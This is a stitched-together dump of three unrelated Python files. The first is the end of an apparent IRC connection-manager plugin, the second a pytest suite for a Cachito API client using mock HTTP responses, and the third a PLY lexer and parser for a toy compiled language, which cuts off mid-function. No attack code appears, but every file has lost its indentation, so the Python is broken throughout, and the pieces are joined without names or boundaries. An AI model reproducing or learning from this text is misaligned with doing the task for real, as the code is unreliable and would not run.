status[name]['port'] = connection.port
return status
def update_config(self, config):
new_irc_connections = {}
removed_connections = set(self.config.keys()) - set(config.keys())
for name, conf in config.items():
hash = get_config_hash(conf)
if name in self.config and config_hash['names'].get(name) == hash:
continue
try:
new_irc_connections[name] = IRCConnection(conf, name)
config_hash['names'][name] = hash
except (MissingConfigOption, TrackerFileParseError, TrackerFileError, IOError) as e:
log.error('Failed to update config. Error when updating %s: %s', name, e)
return
# stop connections that have been removed from config
for name in removed_connections:
self.stop_connection(name)
del irc_connections[name]
# and (re)start the new ones
for name, connection in new_irc_connections.items():
if name in irc_connections:
self.stop_connection(name)
irc_connections[name] = connection
connection.thread.start()
self.config = config
@event('manager.daemon.started')
def irc_start(manager):
irc_update_config(manager)
@event('manager.config_updated')
def irc_update_config(manager):
global irc_manager, config_hash
# Exit if we're not running daemon mode
if not manager.is_daemon:
return
config = manager.config.get('irc')
# No config, no connections
if not config:
log.debug('No irc connections defined in the config')
stop_irc(manager)
return
if irc_bot is None:
log.error('ImportError: irc_bot module not found. Shutting down daemon.')
stop_irc(manager)
manager.shutdown(finish_queue=False)
return
config_hash.setdefault('names', {})
new_config_hash = get_config_hash(config)
if config_hash.get('config') == new_config_hash:
log.verbose('IRC config has not been changed. Not reloading any connections.')
return
config_hash['manager'] = new_config_hash
if irc_manager is not None and irc_manager.is_alive():
irc_manager.update_config(config)
else:
irc_manager = IRCConnectionManager(config)
@event('manager.shutdown_requested')
def shutdown_requested(manager):
stop_irc(manager, wait=True)
@event('manager.shutdown')
def stop_irc(manager, wait=False):
if irc_manager is not None and irc_manager.is_alive():
log.info('Shutting down IRC.')
irc_manager.stop(wait)
# this check is necessary for when the irc manager is the one shutting down the daemon
# a thread can't join itself
if not threading.current_thread() == irc_manager.thread:
# It's important to give the threads time to shut down to avoid socket issues later (eg. quick restart)
irc_manager.thread.join(len(irc_connections.keys()) * 11)
@event('config.register')
def register_plugin():
register_config_key('irc', schema)
| |
"""
Copyright (c) 2019 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
"""
from __future__ import absolute_import
from atomic_reactor.utils.cachito import (
CachitoAPI, CachitoAPIInvalidRequest, CachitoAPIRequestTimeout, CachitoAPIUnsuccessfulRequest)
from requests.exceptions import HTTPError
import flexmock
import pytest
import responses
import json
import os.path
import re
import time
from datetime import datetime
from textwrap import dedent
CACHITO_URL = 'http://cachito.example.com'
CACHITO_REQUEST_ID = 123
CACHITO_REQUEST_DOWNLOAD_URL = \
'{}/api/v1/requests/{}/download'.format(CACHITO_URL, CACHITO_REQUEST_ID)
CACHITO_REQUEST_REF = 'e1be527f39ec31323f0454f7d1422c6260b00580'
CACHITO_REQUEST_REPO = 'https://github.com/release-engineering/retrodep.git'
@responses.activate
@pytest.mark.parametrize('additional_params', (
{},
{'flags': ['spam', 'bacon']},
{'pkg_managers': ['gomod']},
{'pkg_managers': []},
{'pkg_managers': None},
{'user': 'ham'},
{'dependency_replacements': [{
'name': 'eample.com/repo/project',
'type': 'gomod',
'version': '1.1.1',
}]
},
{'packages': {'npm': [{'path': 'client'}]}},
{'packages': None},
))
def test_request_sources(additional_params, caplog):
response_data = {'id': CACHITO_REQUEST_ID}
def handle_request_sources(http_request):
body_json = json.loads(http_request.body)
assert body_json['repo'] == CACHITO_REQUEST_REPO
assert body_json['ref'] == CACHITO_REQUEST_REF
for key, value in additional_params.items():
if value is not None:
assert body_json[key] == value
else:
assert key not in body_json
return (201, {}, json.dumps(response_data))
responses.add_callback(
responses.POST,
'{}/api/v1/requests'.format(CACHITO_URL),
content_type='application/json',
callback=handle_request_sources)
api = CachitoAPI(CACHITO_URL)
response = api.request_sources(CACHITO_REQUEST_REPO, CACHITO_REQUEST_REF, **additional_params)
assert response['id'] == CACHITO_REQUEST_ID
response_json = 'Cachito response:\n{}'.format(json.dumps(response_data, indent=4))
# Since Python 3.7 logger adds additional whitespaces by default -> checking without them
assert re.sub(r'\s+', " ", response_json) in re.sub(r'\s+', " ", caplog.text)
@responses.activate
@pytest.mark.parametrize(('status_code', 'error', 'error_body'), (
(400, CachitoAPIInvalidRequest, json.dumps({'error': 'read the docs, please'})),
(500, HTTPError, 'Internal Server Error'),
))
def test_request_sources_error(status_code, error, error_body, caplog):
responses.add(
responses.POST,
'{}/api/v1/requests'.format(CACHITO_URL),
content_type='application/json',
body=error_body,
status=status_code,
)
with pytest.raises(error):
CachitoAPI(CACHITO_URL).request_sources(CACHITO_REQUEST_REPO, CACHITO_REQUEST_REF)
try:
response_data = json.loads(error_body)
except ValueError: # json.JSONDecodeError in py3
assert 'Cachito response' not in caplog.text
else:
response_json = 'Cachito response:\n{}'.format(json.dumps(response_data, indent=4))
# Since Python 3.7 logger adds additional whitespaces by default -> checking without them
assert re.sub(r'\s+', " ", response_json) in re.sub(r'\s+', " ", caplog.text)
@responses.activate
@pytest.mark.parametrize('burst_params', (
{'burst_retry': 0.01, 'burst_length': 0.5, 'slow_retry': 0.2},
# Set the burst_length to lower than burst_retry to trigger the slow_retry :)
{'burst_retry': 0.01, 'burst_length': 0.001, 'slow_retry': 0.01},
))
@pytest.mark.parametrize('cachito_request', (
CACHITO_REQUEST_ID,
{'id': CACHITO_REQUEST_ID},
))
def test_wait_for_request(burst_params, cachito_request, caplog):
states = ['in_progress', 'in_progress', 'complete']
updated = datetime.utcnow().isoformat()
expected_total_responses_calls = len(states)
expected_final_state = states[-1]
def handle_wait_for_request(http_request):
state = states.pop(0)
return (200, {}, json.dumps({'id': CACHITO_REQUEST_ID, 'state': state, 'updated': updated}))
request_url = '{}/api/v1/requests/{}'.format(CACHITO_URL, CACHITO_REQUEST_ID)
responses.add_callback(
responses.GET,
request_url,
content_type='application/json',
callback=handle_wait_for_request)
response = CachitoAPI(CACHITO_URL).wait_for_request(cachito_request, **burst_params)
assert response['id'] == CACHITO_REQUEST_ID
assert response['state'] == expected_final_state
assert len(responses.calls) == expected_total_responses_calls
expect_in_logs = dedent(
"""\
Request {} is complete
Request url: {}
"""
).format(CACHITO_REQUEST_ID, request_url)
# Since Python 3.7 logger adds additional whitespaces by default -> checking without them
assert re.sub(r'\s+', " ", expect_in_logs) in re.sub(r'\s+', r" ", caplog.text)
@responses.activate
@pytest.mark.parametrize('timeout', (0, 60))
def test_wait_for_request_timeout(timeout, caplog):
request_url = '{}/api/v1/requests/{}'.format(CACHITO_URL, CACHITO_REQUEST_ID)
updated = datetime.utcnow().isoformat()
response_data = {'id': CACHITO_REQUEST_ID, 'state': 'in_progress', 'updated': updated}
responses.add(
responses.GET,
request_url,
content_type='application/json',
status=200,
body=json.dumps(response_data),
)
flexmock(time).should_receive('time').and_return(2000, 1000).one_by_one()
# Hit the timeout during bursting to make the test faster
burst_params = {'burst_retry': 0.001, 'burst_length': 0.02}
with pytest.raises(CachitoAPIRequestTimeout):
api = CachitoAPI(CACHITO_URL, timeout=timeout)
api.wait_for_request(CACHITO_REQUEST_ID, **burst_params)
in_progress_response_json = json.dumps(response_data, indent=4)
expect_in_logs = dedent(
"""\
Request {} not completed after {} seconds of not being updated
Details: {}
"""
).format(request_url, timeout, in_progress_response_json)
# Since Python 3.7 logger adds additional whitespaces by default -> checking without them
assert re.sub(r'\s+', " ", expect_in_logs) in re.sub(r'\s+', " ", caplog.text)
@responses.activate
@pytest.mark.parametrize('error_state,error_reason',
[('failed', 'Cloning the Git repository failed'),
('stale', 'The request has expired')])
def test_wait_for_unsuccessful_request(error_state, error_reason, caplog):
states = ['in_progress', 'in_progress', error_state]
updated = datetime.utcnow().isoformat()
expected_total_responses_calls = len(states)
def handle_wait_for_request(http_request):
state = states.pop(0)
return (200, {}, json.dumps({'state_reason': error_reason,
'repo': CACHITO_REQUEST_REPO,
'state': state,
'ref': CACHITO_REQUEST_REF,
'id': CACHITO_REQUEST_ID,
'updated': updated,
}))
responses.add_callback(
responses.GET,
'{}/api/v1/requests/{}'.format(CACHITO_URL, CACHITO_REQUEST_ID),
content_type='application/json',
callback=handle_wait_for_request)
burst_params = {'burst_retry': 0.001, 'burst_length': 0.5}
with pytest.raises(CachitoAPIUnsuccessfulRequest):
CachitoAPI(CACHITO_URL).wait_for_request(CACHITO_REQUEST_ID, **burst_params)
assert len(responses.calls) == expected_total_responses_calls
failed_response_json = json.dumps(
{'state_reason': error_reason,
'repo': CACHITO_REQUEST_REPO,
'state': error_state,
'ref': CACHITO_REQUEST_REF,
'id': CACHITO_REQUEST_ID,
'updated': updated,
},
indent=4
)
expect_in_logs = dedent(
"""\
Request {} is in "{}" state: {}
Details: {}
"""
).format(CACHITO_REQUEST_ID, error_state, error_reason, failed_response_json)
# Since Python 3.7 logger adds additional whitespaces by default -> checking without them
assert re.sub(r'\s+', " ", expect_in_logs) in re.sub(r'\s+', " ", caplog.text)
@responses.activate
@pytest.mark.parametrize('error_state,error_reason',
[('failed', 'Cloning the Git repository failed'),
('stale', 'The request has expired')])
def test_check_CachitoAPIUnsuccessfulRequest_text(error_state, error_reason, caplog):
states = ['in_progress', 'in_progress', error_state]
updated = datetime.utcnow().isoformat()
expected_total_responses_calls = len(states)
cachito_request_url = '{}/api/v1/requests/{}'.format(CACHITO_URL, CACHITO_REQUEST_ID)
def handle_wait_for_request(http_request):
state = states.pop(0)
return (200, {}, json.dumps({'state_reason': error_reason,
'repo': CACHITO_REQUEST_REPO,
'state': state,
'ref': CACHITO_REQUEST_REF,
'id': CACHITO_REQUEST_ID,
'updated': updated,
}))
responses.add_callback(
responses.GET,
'{}/api/v1/requests/{}'.format(CACHITO_URL, CACHITO_REQUEST_ID),
content_type='application/json',
callback=handle_wait_for_request)
burst_params = {'burst_retry': 0.001, 'burst_length': 0.5}
expected_exc_text = dedent('''\
Cachito request is in "{}" state, reason: {}
Request {} ({}) tried to get repo '{}' at reference '{}'.
'''.format(error_state, error_reason, CACHITO_REQUEST_ID,
cachito_request_url, CACHITO_REQUEST_REPO,
CACHITO_REQUEST_REF))
with pytest.raises(CachitoAPIUnsuccessfulRequest) as excinfo:
CachitoAPI(CACHITO_URL).wait_for_request(CACHITO_REQUEST_ID, **burst_params)
assert len(responses.calls) == expected_total_responses_calls
assert expected_exc_text in str(excinfo.value)
def test_wait_for_request_bad_request_type():
with pytest.raises(ValueError, match=r'Unexpected request type'):
CachitoAPI(CACHITO_URL).wait_for_request('spam')
@responses.activate
@pytest.mark.parametrize('cachito_request', (
CACHITO_REQUEST_ID,
{'id': CACHITO_REQUEST_ID},
))
def test_download_sources(tmpdir, cachito_request):
blob = 'glop-glop-I\'m-a-blob'
expected_dest_path = os.path.join(str(tmpdir), 'remote-source.tar.gz')
responses.add(
responses.GET,
'{}/api/v1/requests/{}/download'.format(CACHITO_URL, CACHITO_REQUEST_ID),
body=blob)
dest_path = CachitoAPI(CACHITO_URL).download_sources(cachito_request, str(tmpdir))
assert dest_path == expected_dest_path
with open(dest_path) as f:
assert f.read() == blob
def test_download_sources_bad_request_type(tmpdir):
with pytest.raises(ValueError, match=r'Unexpected request type'):
CachitoAPI(CACHITO_URL).download_sources('spam', str(tmpdir))
@pytest.mark.parametrize('cachito_request', (
CACHITO_REQUEST_ID,
{'id': CACHITO_REQUEST_ID},
))
def test_assemble_download_url(tmpdir, cachito_request):
url = CachitoAPI(CACHITO_URL).assemble_download_url(cachito_request)
assert url == CACHITO_REQUEST_DOWNLOAD_URL
| |
import sys
sys.path.insert(0, "../..")
from Cube import *
from Machine import *
if sys.version_info[0] >= 3:
raw_input = input
#Define global variables
globalVarCount = {} #10000
globalVarCount[BOOL] = INITIALGLOBALBOOL
globalVarCount[INT] = INITIALGLOBALINT
globalVarCount[FLOAT] = INITIALGLOBALFLOAT
globalVarCount[STRING] = INITIALGLOBALSTRING
localVarCount = {} #20000
localVarCount[BOOL] = INTIALLOCALBOOL
localVarCount[INT] = INTIALLOCALINT
localVarCount[FLOAT] = INTIALLOCALFLOAT
localVarCount[STRING] = INTIALLOCALSTRING
tempVarCount = {} #30000
tempVarCount[BOOL] = INITIALTEMPBOOL
tempVarCount[INT] = INITIALTEMPINT
tempVarCount[FLOAT] = INTIALTEMPFLOAT
tempVarCount[STRING] = INITIALTEMPSTRING
constVarCount = {} #40000
constVarCount[BOOL] = INITIALCONSTBOOL
constVarCount[INT] = INITIALCONSTINT
constVarCount[FLOAT] = INITIALCONSTFLOAT
constVarCount[STRING] = INTIALCONSTSTRING
quadruples = []
operandStack = []
operationStack = []
jumpStack = []
sendParams = []
argumentCount = 0
constants = {'true':{'value':True, 'type':BOOL, 'dir':40001}, 'false':{'value':False, 'type':BOOL, 'dir':40000}, '-1':{'value':-1, 'type':INT, 'dir':42500}}
varGlobal = {}
varLocal = {}
funcGlobal = {}
funcParameters = []
variableType = None
funcType = None
lastVarName = None
lastFuncName = None
funcTypeNext = False
scope = 'global'
# Tokens
reserved = {
'module' : 'MODULE',
'main' : 'MAIN',
'func' : 'FUNC',
'print' : 'PRINT',
'read' : 'READ',
'if' : 'IF',
'else' : 'ELSE',
'elseif' : 'ELSEIF',
'true' : 'TRUE',
'false' : 'FALSE',
'void' : 'VOID',
'while' : 'WHILE',
'bool' : 'TBOOL',
'int' : 'TINT',
'float' : 'TFLOAT',
'string' : 'TSTRING',
'return' : 'RETURN'
}
tokens = [
'ASSIGN', 'PLUS', 'MINUS', 'TIMES', 'DIVIDE',
'LESSTHAN', 'GREATERTHAN', 'LESSTHANEQ', 'GREATERTHANEQ', 'EQUAL', 'DIFFERENT', 'OR', 'AND',
'LEFTBKT', 'RIGHTBKT', 'LEFTSQBKT', 'RIGHTSQBKT', 'LEFTPAREN', 'RIGHTPAREN', 'COMMA', 'SEMICOLON',
'ID', 'NUMBERINT', 'NUMBERFLT', 'STRING'
] + list(reserved.values())
t_ASSIGN = r'='
t_PLUS = r'\+'
t_MINUS = r'\-'
t_TIMES = r'\*'
t_DIVIDE = r'\/'
t_LESSTHAN = r'\<'
t_GREATERTHAN = r'\>'
t_LESSTHANEQ = r'\<='
t_GREATERTHANEQ = r'\>='
t_EQUAL = r'=='
t_DIFFERENT = r'!='
t_OR = r'\|\|'
t_AND = r'&&'
t_LEFTBKT = r'\{'
t_RIGHTBKT = r'\}'
t_LEFTSQBKT = r'\['
t_RIGHTSQBKT = r'\]'
t_LEFTPAREN = r'\('
t_RIGHTPAREN = r'\)'
t_COMMA = r'\,'
t_SEMICOLON = r'\;'
t_NUMBERINT = r'[0-9]+'
t_NUMBERFLT = r'[0-9]+\.[0-9]+'
t_ignore = " \t"
def t_ID(t):
r'[a-z_][a-zA-Z0-9_]*'
t.type = reserved.get(t.value, 'ID')
return t
def t_STRING(t):
r'\".*\"'
return t
def t_newline(t):
r'\n+'
t.lexer.lineno += t.value.count("\n")
def t_error(t):
print("Illegal character '%s'" % t.value[0])
t.lexer.skip(1)
# Build the lexer
import ply.lex as lex
lex.lex()
start = 'moduleg'
# For using empty
def p_empty(p):
'''empty :'''
pass
def p_functions(p):
'''functions : empty
| funcg functions'''
def p_globalVars(p):
'''globalVars : empty
| vars globalVars'''
def p_moduleg(p):
'''moduleg : MODULE ID LEFTBKT globalVars jumpToMain functions maing RIGHTBKT'''
def p_vars4(p):
'''vars4 : constant
| PLUS constant
| MINUS constant'''
p[0] = p[1]
if len(p) > 2:
p[0] = p[2]
if p[1] == '-':
p[0] = '-'+p[2]
def p_vars3(p):
'''vars3 : empty
| LEFTSQBKT cteN RIGHTSQBKT'''
if len(p) > 2:
convertVariableToArray(p[2])
def p_vars2(p):
'''vars2 : empty
| COMMA vars1'''
def p_vars1(p):
'''vars1 : ID addVariable vars3 ASSIGN vars4'''
var = {}
if p[1] in varLocal.keys():
var = varLocal[p[1]]
else:
var = varGlobal[p[1]]
if '-' in p[5]:
p[5] = p[5].replace('-','')
addQuadruple('*', constants['-1']['dir'], constants[p[5]]['dir'], var['dir'])
else:
addQuadruple('=', constants[p[5]]['dir'], '', var['dir'])
if getResultType(var['type'], '=', constants[p[5]]['type']) < 0:
print('Error: Assignment type mismatch')
exit(1)
def p_vars(p):
'''vars : type vars1 vars2 SEMICOLON'''
def p_func3(p):
'''func3 : empty
| RETURN expression funcReturn SEMICOLON
| statute func3'''
def p_func2(p):
'''func2 : empty
| statute func2'''
def p_func1(p):
'''func1 : VOID saveFuncTypeVoid ID saveFuncName LEFTPAREN parameters RIGHTPAREN funcStart LEFTBKT func2 RIGHTBKT funcEnd
| funcTypeNext type ID saveFuncName LEFTPAREN parameters RIGHTPAREN funcStart LEFTBKT func3 RIGHTBKT funcEnd'''
def p_funcg(p):
'''funcg : FUNC changeToLocalScope func1 changeToGlobalScope'''
def p_maing(p):
'''maing : MAIN changeToLocalScope completeJumpToMain block'''
addQuadruple('END', '', '', '')
print('-------- quadruples')
for i in range(0, len(quadruples)):
q = quadruples[i]
print('%s {var1:%s } {op:%s } {var2:%s } {result:%s }' % (i, q['var1'], q['op'], q['var2'], q['result']))
print('--------')
print('-------- stacks')
print(operandStack)
print(operationStack)
print(jumpStack)
print('--------')
print('global vars: %s' % varGlobal)
print('functions: %s' % funcGlobal)
print('constants: %s' % constants)
def p_block1(p):
'''block1 : empty
| statute block1'''
def p_block(p):
'''block : LEFTBKT block1 RIGHTBKT'''
def p_write(p):
'''write : PRINT LEFTPAREN cte RIGHTPAREN SEMICOLON'''
var = {}
if p[3] in varLocal.keys():
var = varLocal[p[3]]
elif p[3] in varGlobal.keys():
var = varGlobal[p[3]]
else:
var = constants[p[3]]
addQuadruple('PRINT', '', '', var['dir'])
def p_readg(p):
'''readg : READ LEFTPAREN ID RIGHTPAREN SEMICOLON'''
var = {}
if p[3] in varLocal.keys():
var = varLocal[p[3]]
else:
var = varGlobal[p[3]]
addQuadruple('READ', '', '', var['dir'])
def p_expression1(p):
'''expression1 : empty
| GREATERTHANEQ saveOperation exp
| LESSTHANEQ saveOperation exp
| GREATERTHAN saveOperation exp
| LESSTHAN saveOperation exp
| EQUAL saveOperation exp
| DIFFERENT saveOperation exp
| OR saveOperation exp
| AND saveOperation exp'''
global operationStack
global operandStack
if len(operationStack) > 0:
if operationStack[-1] == '<' or operationStack[-1] == '>' or operationStack[-1] == '<=' or operationStack[-1] == '>=' or operationStack[-1] == '==' or operationStack[-1] == '!=':
operand2 = operandStack.pop()
operation = operationStack.pop()
operand1 = operandStack.pop()
resultType = getResultType(operand1['type'], operation, operand2['type'])
if resultType > 0:
tempVar = {'dir':tempVarCount[resultType], 'type':resultType}
addQuadruple(operation, operand1['dir'], operand2['dir'], tempVar)
operandStack.append(tempVar)
tempVarCount[resultType] += 1
else:
print('Error: Expression type mismatch')
exit(1)
p[0] = tempVar
def p_expression(p):
'''expression : exp expression1'''
def p_exp1(p):
'''exp1 : empty
| PLUS saveOperation exp exp1
| MINUS saveOperation exp exp1'''
p[0] = p[1]
if len(p) > 2:
p[0] = p[3]
def p_exp(p):
'''exp : term exp1'''
p[0] = p[1]
def p_term1(p):
'''term1 : empty
| TIMES saveOperation term term1
| DIVIDE saveOperation term term1'''
def p_term(p):
'''term : factor term1 termEnded'''
def p_factor1(p):
'''factor1 : constant
| PLUS constant
| MINUS constant'''
global operandStack
operand = {}
if len(p) == 3:
operand = getOperand(p[2])
if p[1] == '-':
resultType = getResultType(operand['type']%10, '*', INT)
tempVar = {'dir':tempVarCount[resultType], 'type':resultType}
addQuadruple('*', constants['-1']['dir'], operand, tempVar['dir'])
operand = tempVar
tempVarCount[resultType] += 1
else:
operand = getOperand(p[1])
operandStack.append(operand)
def p_factor(p):
'''factor : LEFTPAREN addFakeBottom expression RIGHTPAREN removeFakeBottom factorEnded
| factor1 factorEnded'''
def p_statute(p):
'''statute : call
| assignement
| vars
| condition
| readg
| write
| cycle'''
if p[1] is not None:
if p[1] != VOID:
print('Warning: Unused function return value.')
operandStack.pop()
def p_cycle(p):
'''cycle : WHILE whileStart LEFTPAREN expression RIGHTPAREN whileCheck block whileEnd'''
def p_call2(p):
'''call2 : empty
| COMMA expression addArgument call2'''
global argumentCount
if argumentCount != len(sendParams):
print('Error: Number of arguments doesn\'t match number of parameters declared')
exit(1)
if len(p) == 5:
argumentCount -= 1
argument = operandStack.pop()
parameter = sendParams.pop()
resultType = getResultType(parameter['type'], '=', argument['type'])
if resultType > 0:
addQuadruple('PARAM', argument['dir'], '', parameter['dir'])
else:
print('Error: Argument type doesn\'t match the type of the parameter declared')
exit(1)
def p_call1(p):
'''call1 : empty
| expression addArgument call2'''
global argumentCount
if argumentCount != len(sendParams):
print('Error: Number of arguments doesn\'t match number of parameters declared')
exit(1)
if len(p) == 4:
argument = operandStack.pop()
parameter = sendParams.pop()
resultType = getResultType(parameter['type'], '=', argument['type'])
if resultType > 0:
addQuadruple('PARAM', argument['dir'], '', parameter['dir'])
else:
print('Error: Argument type doesn\'t match the type of the parameter declared')
exit(1)
def p_call(p):
'''call : ID prepareParams LEFTPAREN call1 RIGHTPAREN SEMICOLON'''
argumentCount = 0
addQuadruple('GOFUNC', '', '', funcGlobal[p[1]]['startQuadruple'])
if funcGlobal[p[1]]['type'] != VOID:
operandStack.append(funcGlobal[p[1]])
p[0] = funcGlobal[p[1]]['type']
def p_prepareParams(p):
'''prepareParams : empty'''
global sendParams
addQuadruple('MEMORY', '', '', funcGlobal[p[-1]])
sendParams = funcGlobal[p[-1]]['parameters']
def p_addArgument(p):
'''addArgument : empty'''
global argumentCount
argumentCount += 1
def p_parameters1(p):
'''parameters1 : empty
| COMMA type ID addParameter parameters1'''
def p_parameters(p):
'''parameters : empty
| type ID addParameter parameters1'''
def p_constant1(p):
'''constant1 : empty
| COMMA cte constant1'''
def p_constant(p):
'''constant : cte
| LEFTSQBKT cte constant1 RIGHTSQBKT'''
if len(p) == 2:
p[0] = p[1]
def p_cte(p):
'''cte : ID
| varArr
| TRUE
| FALSE
| cteN
| cteS'''
p[0] = p[1]
def p_cteN(p):
'''cteN : NUMBERINT addConstant
| NUMBERFLT addConstant'''
p[0] = p[1]
def p_cteS(p):
'''cteS : STRING'''
cte = p[1]
if '\"' in cte:
cte = cte.replace('\"','')
global constants
if not cte in constants.keys():
constants[cte] = {'value':cte, 'type':STRING, 'dir':constVarCount[STRING]}
constVarCount[STRING] += 1
p[0] = cte
def p_condition2(p):
'''condition2 : empty ifEnd
| ELSE block ifEnd'''
def p_condition1(p):
'''condition1 : empty
| ELSEIF LEFTPAREN expression RIGHTPAREN ifStart2 block ifContinue condition1'''
def p_condition(p):
'''condition : IF LEFTPAREN expression RIGHTPAREN ifStart block ifContinue condition1 condition2'''
def p_assignement2(p):
'''assignement2 : call
| expression SEMICOLON'''
if p[1] == VOID:
print('Error: Cannot assign a function of type void.')
exit(1)
def p_assignement1(p):
'''assignement1 : ID
| varArr'''
p[0] = p[1]
if not p[1] in varLocal.keys() and not p[1] in varGlobal.keys():
print('Error: Cannot assign undeclared variable')
exit(1)
def p_assignement(p):
'''assignement : assignement1 ASSIGN assignement2'''
var = {}
if p[1] in varLocal.keys():
var = varLocal[p[1]]
else:
var = varGlobal[p[1]]
operand = operandStack.pop()
resultType = getResultType(var['type'], '=', operand['type']%10)
if resultType > 0:
addQuadruple('=', operand['dir'], '', var['dir'])
else:
print('Error: Assignment type mismatch')
exit(1)
def p_varArr(p):
'''varArr : ID LEFTSQBKT exp RIGHTSQBKT'''
var = {}
if p[1] in varLocal.keys():
var = varLocal[p[1]]
else:
var = varGlobal[p[1]]
print('vararr')
print(var)
def p_type(p):
'''type : TBOOL addType
| TINT addType
| TFLOAT addType
| TSTRING addType'''
# extra grammar
def p_addVariable(p):
'''addVariable : empty'''
global lastVarName
lastVarName = p[-1]
variableName = lastVarName
addVariable(variableName, variableType)
def p_addConstant(p):
'''addConstant : empty'''
constType = -1
cte = num(p[-1])
if type(cte) is int:
constType = INT
else:
constType = FLOAT
global constants
if not str(cte) in constants.keys():
constants[str(cte)] = {'value':cte, 'type':constType, 'dir':constVarCount[constType]}
constVarCount[constType] += 1
def p_saveFuncName(p):
'''saveFuncName : empty'''
global lastFuncName
lastFuncName = p[-1]
def p_funcTypeNext(p):
'''funcTypeNext : empty'''
global funcTypeNext
funcTypeNext = True
def p_saveFuncTypeVoid(p):
'''saveFuncTypeVoid : empty'''
global funcType
funcType = VOID
def p_addParameter(p):
'''addParameter : empty'''
global lastVarName
global funcParameters
lastVarName = p[-1]
variableName = lastVarName
addVariable(variableName, variableType)
funcParameters.append(varLocal[variableName])
def p_addType(p):
'''addType : empty'''
global variableType
global funcTypeNext
global funcType
if funcTypeNext:
funcType = getTypeValue(p[-1])
else:
variableType = getTypeValue(p[-1])
funcTypeNext = False
def p_saveOperation(p):
'''saveOperation : empty'''
global operationStack
operationStack.append(p[-1])
def p_termEnded(p):
'''termEnded : empty'''
global operationStack
global operandStack
if len(operationStack) > 0:
if operationStack[-1] == '+' or operationStack[-1] == '-' or operationStack[-1] == '||':
operand2 = operandStack.pop()
operation = operationStack.pop()
operand1 = operandStack.pop()
resultType = getResultType(operand1['type']%10, operation, operand2['type'])
if resultType > 0:
tempVar = {'dir':tempVarCount[resultType], 'type':resultType}
addQuadruple(operation, operand1['dir'], operand2['dir'], tempVar['dir'])
operandStack.append(tempVar)
tempVarCount[resultType] += 1
else:
print('Error: Term type mismatch')
exit(1)
p[0] = "hio"
def p_factorEnded(p):
'''factorEnded : empty'''
global operationStack
global operandStack
if len(operationStack) > 0:
if operationStack[-1] == '*' or operationStack[-1] == '/' or operationStack[-1] == '&&':
operand2 = operandStack.pop()
operation = operationStack.pop()
operand1 = operandStack.pop()
resultType = getResultType(operand1['type']%10, operation, operand2['type'])
if resultType > 0:
tempVar = {'dir':tempVarCount[resultType], 'type':resultType}
addQuadruple(operation, operand1['dir'], operand2['dir'], tempVar['dir'])
operandStack.append(tempVar)
tempVarCount[resultType] += 1
else:
print('Error: Factor type mismatch')
exit(1)
def p_addFakeBottom(p):
'''addFakeBottom : empty'''
global operationStack
operationStack.append('(')
def p_removeFakeBottom(p):
'''removeFakeBottom : empty'''
global operationStack
operationStack.pop()
def p_changeToLocalScope(p):
'''changeToLocalScope : empty'''
global scope
scope = 'local'
def p_changeToGlobalScope(p):
'''changeToGlobalScope : empty'''
global scope
scope = 'global'
def p_ifStart(p):
'''ifStart : empty'''
jumpStack.append('IF')
p_ifStart2(p)
def p_ifStart2(p):
'''ifStart2 : empty'''
condition = operandStack.pop()
if condition['type'] == BOOL:
addQuadruple('GOTOF', condition, '', '')
jumpStack.append(len(quadruples)-1)
else:
print('Error: Condition in \'if\' statement must evaluate to a bool.')
exit(1)
def p_ifContinue(p):
'''ifContinue : empty'''
addQuadruple('GOTO', '', '', '')
complete = jumpStack.pop()
jumpStack.append(len(quadruples)-1)
completeQuadruple(complete, len(quadruples))
def p_ifEnd(p):
'''ifEnd : empty'''
while jumpStack[-1] != 'IF':
completeQuadruple(jumpStack.pop(), len(quadruples))
jumpStack.pop()
def p_whileStart(p):
'''whileStart : empty'''
jumpStack.append(len(quadruples))
def p_whileCheck(p):
'''whileCheck : empty'''
condition = operandStack.pop()
if condition['type'] == BOOL:
addQuadruple('GOTOF', condition, '', '')
jumpStack.append(len(quadruples)-1)
else:
print('Error: Condition in \'if\' statement must evaluate to a bool.')
exit(1)
def p_whileEnd(p):
'''whileEnd : empty'''
complete = jumpStack.pop()
addQuadruple('GOTO', '', '', jumpStack.pop())
completeQuadruple(complete, len(quadruples))
def p_jumpToMain(p):
'''jumpToMain : empty'''
addQuadruple('GOTO', '', '', '')
jumpStack.append(len(quadruples)-1)
def p_completeJumpToMain(p):
'''completeJumpToMain : empty'''
completeQuadruple(jumpStack.pop(), len(quadruples))
def p_funcStart(p):
'''funcStart : empty'''
addFunction(lastFuncName, funcType, len(quadruples))
def p_funcReturn(p):
'''funcReturn : empty'''
print('return')
print(p[-1])
value = operandStack.pop()
if value['type'] == funcGlobal[lastFuncName]['type']:
addQuadruple('RETURN', '', '', value['dir'])
else:
print('Error: Type of return value in function doesn\'t match function\'s declared type.')
exit(1)
def p_funcEnd(p):
'''funcEnd : empty'''
funcGlobal[lastFuncName]['parameters'] = funcParameters
print('local vars: %s' % varLocal)
resetLocalCounters()
addQuadruple('ENDFUNC', '', '', '')
def p_error(p):
if p:
print("Syntax error at '%s'" % p)#p.value)
else:
print("Syntax error at EOF")
exit(1)
import ply.yacc as yacc
yacc.yacc()
#Functions
def addVariable(variable, varType):
global varGlobal
global varLocal
if variable in funcGlobal.keys():
print("Variable error: Variable cannot have the same name as a function")
exit(1)
if scope == 'global':
if not variable in varGlobal.keys():
varGlobal[variable] = {'name':variable, 'type':varType, 'dir':globalVarCount[varType]}
globalVarCount[varType] += 1
else:
print("Variable error: Variable is already declared globally")
exit(1)
else:
if not variable in varLocal.keys():
varLocal[variable] = {'name':variable, 'type':varType, 'dir':localVarCount[varType]}
localVarCount[varType] += 1
else:
print("Variable error: Variable is already declared locally")
exit(1)
def convertVariableToArray(size):
global varGlobal
global varLocal
if scope == 'global':
varGlobal[lastVarName]['type'] *= 11
varGlobal[lastVarName]['size'] = size
else:
varLocal[lastVarName]['type'] *= 11
varLocal[lastVarName]['size'] = size
def addFunction(name, funType, startQuadruple):
global funcGlobal
if name in varGlobal.keys():
print("Function error: Function cannot have the same name as a variable")
exit(1)
if not name in funcGlobal.keys():
funcGlobal[name] = {'name':name, 'type':funType, 'startQuadruple':startQuadruple, 'boolCount':localVarCount[BOOL], 'intCount':localVarCount[INT], 'floatCount':localVarCount[FLOAT], 'stringCount':localVarCount[STRING], 'boolTempCount':tempVarCount[BOOL], 'intTempCount':tempVarCount[INT], 'floatTempCount':tempVarCount[FLOAT], 'stringTempCount':tempVarCount[STRING]}
if funType != 0:
funcGlobal[name]['dir'] = globalVarCount[funType]
globalVarCount[funType] += 1
else:
